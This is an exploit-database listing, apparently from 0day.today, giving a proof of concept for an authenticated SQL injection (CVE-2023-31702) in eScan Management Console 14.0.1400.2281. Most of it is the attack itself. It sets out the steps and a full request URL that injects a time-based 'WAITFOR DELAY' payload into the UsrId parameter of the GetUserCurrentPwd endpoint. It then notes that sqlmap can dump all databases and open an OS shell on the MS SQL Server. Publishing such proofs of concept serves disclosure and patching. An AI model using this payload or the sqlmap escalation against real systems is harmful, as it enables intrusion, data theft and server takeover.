Lucene search

K
zdtSahil Ojha1337DAY-ID-38718
HistoryMay 23, 2023 - 12:00 a.m.

eScan Management Console 14.0.1400.2281 - SQL Injection Vulnerability

2023-05-2300:00:00
Sahil Ojha
0day.today
113
escan
management console
sql injection
vulnerability
authenticated
windows
cve-2023-31702
sqlmap
proof of concept

0.005 Low

EPSS

Percentile

75.6%

# Exploit Title: eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
# Exploit Author: Sahil Ojha
# Vendor Homepage: https://www.escanav.com
# Software Link: https://cl.escanav.com/ewconsole.dll
# Version: 14.0.1400.2281
# Tested on: Windows
# CVE : CVE-2023-31702

*Step of Reproduction/Proof of concept(POC)*

1. Login into the escan management console with a valid username and
password as root user.
2. Navigate to URL:
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=4176
3. Inject the payload into the UsrId parameter to confirm the SQL
injection as shown below:
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR
DELAY '0:0:5'--&cnt=4176
4. The time delay of 5 seconds confirmed that "UsrId" parameter was
vulnerable to SQL Injection. Furthermore, it was also possible to dump
all the databases and inject OS shell directly into the MS SQL Server
using SQLMap tool.

0.005 Low

EPSS

Percentile

75.6%